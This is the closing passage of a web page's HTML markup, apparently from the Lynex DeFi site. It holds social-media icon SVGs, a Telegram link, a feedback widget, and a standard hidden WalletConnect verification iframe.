          <path d="M524.531,69.836a1.5,1.5,0,0,0-.764-.7A485.065,485.065,0,0,0,404.081,32.03a1.816,1.816,0,0,0-1.923.91,337.461,337.461,0,0,0-14.9,30.6,447.848,447.848,0,0,0-134.426,0,309.541,309.541,0,0,0-15.135-30.6,1.89,1.89,0,0,0-1.924-.91A483.689,483.689,0,0,0,116.085,69.137a1.712,1.712,0,0,0-.788.676C39.068,183.651,18.186,294.69,28.43,404.354a2.016,2.016,0,0,0,.765,1.375A487.666,487.666,0,0,0,176.02,479.918a1.9,1.9,0,0,0,2.063-.676A348.2,348.2,0,0,0,208.12,430.4a1.86,1.86,0,0,0-1.019-2.588,321.173,321.173,0,0,1-45.868-21.853,1.885,1.885,0,0,1-.185-3.126c3.082-2.309,6.166-4.711,9.109-7.137a1.819,1.819,0,0,1,1.9-.256c96.229,43.917,200.41,43.917,295.5,0a1.812,1.812,0,0,1,1.924.233c2.944,2.426,6.027,4.851,9.132,7.16a1.884,1.884,0,0,1-.162,3.126,301.407,301.407,0,0,1-45.89,21.83,1.875,1.875,0,0,0-1,2.611,391.055,391.055,0,0,0,30.014,48.815,1.864,1.864,0,0,0,2.063.7A486.048,486.048,0,0,0,610.7,405.729a1.882,1.882,0,0,0,.765-1.352C623.729,277.594,590.933,167.465,524.531,69.836ZM222.491,337.58c-28.972,0-52.844-26.587-52.844-59.239S193.056,219.1,222.491,219.1c29.665,0,53.306,26.82,52.843,59.239C275.334,310.993,251.924,337.58,222.491,337.58Zm195.38,0c-28.971,0-52.843-26.587-52.843-59.239S388.437,219.1,417.871,219.1c29.667,0,53.307,26.82,52.844,59.239C470.715,310.993,447.538,337.58,417.871,337.58Z">
          </path>
         </svg>
        </a>
        <a class="connectButton" href="https://t.me/lynexfi" rel="noreferrer" target="_blank">
         <svg class="max-w-[36px] text-themeOrange text-[36px]" fill="currentColor" height="1em" stroke="currentColor" stroke-width="0" viewbox="0 0 496 512" width="1em" xmlns="http://www.w3.org/2000/svg">
          <path d="M248,8C111.033,8,0,119.033,0,256S111.033,504,248,504,496,392.967,496,256,384.967,8,248,8ZM362.952,176.66c-3.732,39.215-19.881,134.378-28.1,178.3-3.476,18.584-10.322,24.816-16.948,25.425-14.4,1.326-25.338-9.517-39.287-18.661-21.827-14.308-34.158-23.215-55.346-37.177-24.485-16.135-8.612-25,5.342-39.5,3.652-3.793,67.107-61.51,68.335-66.746.153-.655.3-3.1-1.154-4.384s-3.59-.849-5.135-.5q-3.283.746-104.608,69.142-14.845,10.194-26.894,9.934c-8.855-.191-25.888-5.006-38.551-9.123-15.531-5.048-27.875-7.717-26.8-16.291q.84-6.7,18.45-13.7,108.446-47.248,144.628-62.3c68.872-28.647,83.183-33.623,92.511-33.789,2.052-.034,6.639.474,9.61,2.885a10.452,10.452,0,0,1,3.53,6.716A43.765,43.765,0,0,1,362.952,176.66Z">
          </path>
         </svg>
        </a>
       </div>
      </div>
     </div>
    </div>
    <div class="Toastify">
    </div>
   </div>
  </div>
  <svg height="0" id="SvgjsSvg1001" style="overflow: hidden; top: -100%; left: -100%; position: absolute; opacity: 0;" version="1.1" width="2" xmlns="http://www.w3.org/2000/svg" xmlns:svgjs="http://svgjs.dev" xmlns:xlink="http://www.w3.org/1999/xlink">
   <defs id="SvgjsDefs1002">
   </defs>
   <polyline id="SvgjsPolyline1003" points="0,0">
   </polyline>
   <path d="M0 0 " id="SvgjsPath1004">
   </path>
  </svg>
  <div class="i-sl-button left-middle" id="sleek-button">
   <div class="i-sl-button-inner default icon-logo">
    <div class="i-sl-button-btn active" id="sleek-button-btn">
     <div class="i-sl-button-logo">
      <div>
       <img alt="Feedback" src="https://storage.sleekplan.com/products/83903301/assets/743882beb53412807b84ab28422b88f6.jpg"/>
      </div>
     </div>
     <div class="i-sl-button-desc">
      <span>
       Feedback
      </span>
     </div>
     <div class="i-sl-button-counter" id="i-sl-button-counter">
      <div class="i-sl-button-counter-inner" id="i-sl-button-counter-inner">
       0
      </div>
     </div>
    </div>
   </div>
  </div>
  <iframe id="verify-api" src="https://verify.walletconnect.com/3640d0bf5a1aa2386759bbd5019fe083" style="display: none;">
  </iframe>
  <wcm-modal>
  </wcm-modal>
 </body>
</html>
